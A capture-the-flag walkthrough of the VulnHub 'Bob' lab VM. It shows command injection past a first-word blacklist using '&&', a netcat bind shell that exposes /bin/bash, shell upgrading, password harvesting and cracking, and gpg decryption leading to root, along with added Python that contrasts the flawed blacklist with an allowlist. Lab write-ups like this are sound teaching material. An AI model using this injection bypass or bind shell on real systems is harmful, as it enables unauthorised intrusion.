This article is a walkthrough of how I solved the Bob CTF challenge. You can download Bob CTF via this link: https://www.vulnhub.com/entry/bob-101,226/.
It is a beginner-to-intermediate challenge, and at the end we have to gain root access and get the flag.
So let’s do this:
To find the vulnerable machine from your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/
I used netdiscover to get the IP address of the Bob virtual machine. In my case, the IP address is 192.168.0.107.
netdiscover -r 192.168.0.1/24
I scanned the host with nmap and discovered this:
So 80 and 21 are open. I visited their website.
It is under construction. I couldn't find much information in the page source either. So I fired up nikto to get more info:
nikto -h 192.168.0.107
It says robots.txt is present.
The passwords.html page contains this:
Really who made this file at least get a hash of your password to display, hackers can't do anything with a hash, this is probably why we had a security breach in the first place. Come on people this is basic 101 security! I have moved the file off the server. Don't make me have to clean up the mess every time someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob
login.php and lat_memo.html also don't contain much information. Then I turned to dev_shell.php:
It seems the admin gave us a command-injection platform. I used a lot of commands here, but I will only give the useful ones in this article.
I tried ls as my first command.
But it didn't seem to work, so I used a stacked approach to see if that works, and it does:
cd . &&ls -a gave me the above result. Looking in the directory I was in, I found 2 important files: .hint and dev_shell.bak
I downloaded dev_shell.bak. It has the following code:
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command..."); //tries to run a program literally named "running command...", so this line does nothing useful
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !== false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work 😛
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands: only the FIRST space-separated word is compared against $bad_words
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']); //raw user input handed to a shell, so &&, | and $(...) still work
}
}
?>
</div>
</body>
</html>
It's simply an input-sanitizing script: it rejects any command containing ';' and then compares only the first space-separated word against the array, so a blacklisted command placed after && is never inspected. Now I know why the ls command was not working. 😛
The .hint file, which is a hidden file, has the following text:
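To make the weakness concrete, here is the dev_shell.bak check re-expressed in Python, with a hardened allowlist dispatcher beside it. This is an added example, not code from the post or from the VM; the allowed action names and their argv are assumptions chosen for illustration.

```python
import shlex
import subprocess

# The blacklist from dev_shell.bak, unchanged
BAD_WORDS = ["pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"]


def blacklist_refuses(command: str) -> bool:
    """Re-expression of the PHP checks: refuse if ';' appears anywhere,
    otherwise refuse only if the FIRST space-separated word is blacklisted.
    Returns True when dev_shell.php would print its 'skid' message."""
    if ";" in command:
        return True
    first_word = command.strip().split(" ")[0]  # same as explode(' ', trim($command))[0]
    return first_word in BAD_WORDS


# Hardened replacement (assumption for illustration): a fixed allowlist that maps
# a short action name to a literal argv. User text never reaches a shell.
ALLOWED_ACTIONS = {
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
    "whoami": ["whoami"],
}


def allowlist_dispatch(command: str):
    """Return the argv to execute for an allowed action, or None to refuse.
    Only exact action names are accepted; extra tokens are rejected outright
    instead of pattern-matched, so '&&', '|', '$(...)' and friends cannot matter."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if len(tokens) != 1 or tokens[0] not in ALLOWED_ACTIONS:
        return None
    return list(ALLOWED_ACTIONS[tokens[0]])


def run_allowed(command: str) -> str:
    """Execute an allowed action without a shell (shell=False) and return its stdout."""
    argv = allowlist_dispatch(command)
    if argv is None:
        return "refused"
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for probe in ["ls", "ls -a", "ls; id", "cd . && ls -a"]:
        print(f"{probe!r:20} blacklist refuses: {str(blacklist_refuses(probe)):5} "
              f"allowlist argv: {allowlist_dispatch(probe)}")
```

The point of the allowlist version is that the decision is made on a closed set of action names rather than on the user's text, so there is no list of "bad" words to keep complete.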
No, I haven't tried spawning a tty shell yet. So let's spawn a shell:
A netcat cheat sheet came to the rescue. From the above php script, I gathered that nc is installed and I can use it to open a bind shell on any port. I used
cd .&&nc -l -p 3333 -e /bin/bash
and then on my Kali OS I used this command: nc 192.168.0.107 3333
and I got a shell. This is not a fully interactive shell, so I spawned a bash shell using:
python -c 'import pty;pty.spawn("/bin/bash")'
Once I got the real shell, I checked for hidden files. I checked the home directory and found that this VM has 4 users: bob, elliot, jc, seb. I checked the elliot directory first and landed on this file, theadminisdumb.txt, which said:
With this I knew that elliot is not an admin but bob is. It also gives information about the password of James [who is jc], which is Qwerty, and Elliot's password, which is theadminisdumb. So I tried logging in:
su elliot //password: theadminisdumb doesn't work
su james //password: Qwerty works
Now I traversed bob's directory and found a hidden file, .old_passwordfile.html, which gave me the password for sebastian [user seb]: T1tanium_Pa$$word_Hack3rs_Fear_M3.
su seb //password works 😉
So now I need to know the password for bob; elliot's password is not required since he is not the admin here. So I searched bob's directory for any password file and landed on Downloads.
I found a backed-up ftp password file for bob and ran it through john; it cracks to Qwerty. So I tried it on both ftp and the normal OS login, but it doesn't work.
I further searched the Documents directory, where I came across these files: login.txt.gpg [I overlooked this file as a jpg before 😛 and then I saw it again],
Secret [I overlooked login.txt.gpg for this folder ;p],
and then staff.txt, which doesn't contain much information.
I went to the Secret folder and at the end of it found notes.sh, and I opened it.
At first I thought it was of no use, but then it occurred to me that the starting letters of these echoed lines form "HARPOCRATES". I tried it on bob, but it didn't work.
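Pulling an acrostic out of a script by eye is error-prone, so here is a small extractor for the pattern described above. This is an added example, not code from the post; the notes.sh contents below are constructed (the real file is not reproduced in the post) and only their first letters matter.

```python
import re

# Constructed stand-in for Secret/notes.sh; the echo lines are invented here.
NOTES_SH = """#!/bin/bash
clear
echo "Harry, please bring the printer toner on Monday"
echo "Ask Sebastian about the budget spreadsheet"
echo "Remind James that the conference room is booked"
echo "Pick up the badge reader from reception"
echo 'Order more ethernet cables for the lab'
echo "Check the backup logs before Friday"
echo "Review the firewall change request"
echo "Archive last quarter's tickets"
echo "Test the new VPN profile"
echo "Email the vendor about the support contract"
echo "Schedule the security meeting"
"""

# An echo statement: optional leading whitespace, 'echo', optional -n/-e flags,
# an optional opening quote, then the first printable character we care about.
ECHO_LINE = re.compile(r'''^\s*echo\s+(?:-[neE]+\s+)?["']?(\S)''')


def first_letters_of_echo_lines(script: str) -> str:
    """Return the first character of every echoed string, in file order.
    Lines that are not echo statements (shebang, clear, comments) are skipped."""
    letters = []
    for line in script.splitlines():
        m = ECHO_LINE.match(line)
        if m:
            letters.append(m.group(1))
    return "".join(letters)


def acrostic_readings(script: str) -> list:
    """Both readings worth trying as a passphrase: top-down and bottom-up."""
    word = first_letters_of_echo_lines(script)
    return [word, word[::-1]]


if __name__ == "__main__":
    print(acrostic_readings(NOTES_SH))
```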
So I went back and started looking again, all frustrated!!
I found flag.txt, which is in the / directory. But I can't open it unless I am root.
Remember the file login.txt.gpg? That's my last cue!
I googled .gpg and found this:
GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh).
login.txt.gpg is an encrypted file and I need a passphrase to decrypt it, and I only have "HARPOCRATES", which I found in bob's directories.
So I tried gpg -d login.txt.gpg on the console, but it is not giving a prompt for the passphrase entry. Another problem!
So I searched for more ways to pass the passphrase on the command line itself.
I found out about batch mode, wherein you can pass the decryption passphrase on the command line itself.
gpg --batch --passphrase HARPOCRATES --decrypt login.txt.gpg
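The missing prompt happens because GnuPG 2 asks gpg-agent to pop up a pinentry, which has nowhere to draw when the session is a netcat shell without a terminal. Batch mode works around that, but a passphrase given with --passphrase sits in the process list for anyone running ps. The following added example (not from the post) shows the same decryption driven from Python with the passphrase fed on stdin via --passphrase-fd 0 and --pinentry-mode loopback, inside a throwaway keyring directory; the file contents and the "HARPOCRATES" passphrase are constructed test data, and the code assumes a GnuPG 2.1 or newer binary on PATH.

```python
import os
import shutil
import subprocess
import tempfile


def _gpg(args, homedir, passphrase):
    """Run gpg non-interactively inside an isolated keyring directory.
    --batch suppresses prompts, --pinentry-mode loopback stops gpg-agent from
    launching a pinentry that needs a terminal, and --passphrase-fd 0 reads the
    passphrase from stdin so it never appears on the command line."""
    cmd = ["gpg", "--batch", "--yes", "--quiet", "--homedir", homedir,
           "--pinentry-mode", "loopback", "--passphrase-fd", "0"] + args
    return subprocess.run(cmd, input=(passphrase + "\n").encode(),
                          capture_output=True, check=True)


def gpg_decrypt_file(path: str, passphrase: str, homedir: str) -> bytes:
    """Decrypt a passphrase-encrypted (symmetric) file and return the plaintext."""
    return _gpg(["--decrypt", path], homedir, passphrase).stdout


def gpg_roundtrip(passphrase: str, plaintext: bytes) -> bytes:
    """Encrypt plaintext to a .gpg file with a passphrase, then decrypt it again,
    all in a temporary GNUPGHOME so the user's real keyring is untouched."""
    with tempfile.TemporaryDirectory() as tmp:
        homedir = os.path.join(tmp, "gnupghome")
        os.mkdir(homedir, 0o700)  # gpg refuses homedirs with loose permissions
        src = os.path.join(tmp, "login.txt")
        enc = os.path.join(tmp, "login.txt.gpg")
        with open(src, "wb") as f:
            f.write(plaintext)
        _gpg(["--symmetric", "--output", enc, src], homedir, passphrase)
        return gpg_decrypt_file(enc, passphrase, homedir)


def gpg_available() -> bool:
    """True only if a usable gpg is installed and a round trip succeeds here
    (the binary must understand --pinentry-mode and be able to start gpg-agent)."""
    if shutil.which("gpg") is None:
        return False
    try:
        return gpg_roundtrip("probe", b"probe\n") == b"probe\n"
    except (subprocess.CalledProcessError, OSError):
        return False


if __name__ == "__main__":
    if gpg_available():
        # Constructed content standing in for the decrypted login.txt
        print(gpg_roundtrip("HARPOCRATES", b"the password for bob is b0bcat_\n"))
    else:
        print("gpg is not usable in this environment")
```

A wrong passphrase makes gpg exit non-zero, so gpg_decrypt_file raises CalledProcessError rather than returning garbage; callers that try a list of candidate passphrases should catch exactly that.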
The password for bob is b0bcat_.
I logged in as bob, but I still can't access the flag.txt file; it gave me this output when I ran cat /flag.txt
I used the less and more pagers too, but my access is still denied. So I tried logging in as root with the same password as bob's; I got in, and here is the flag.
That’s it for now!
Ciao 🙂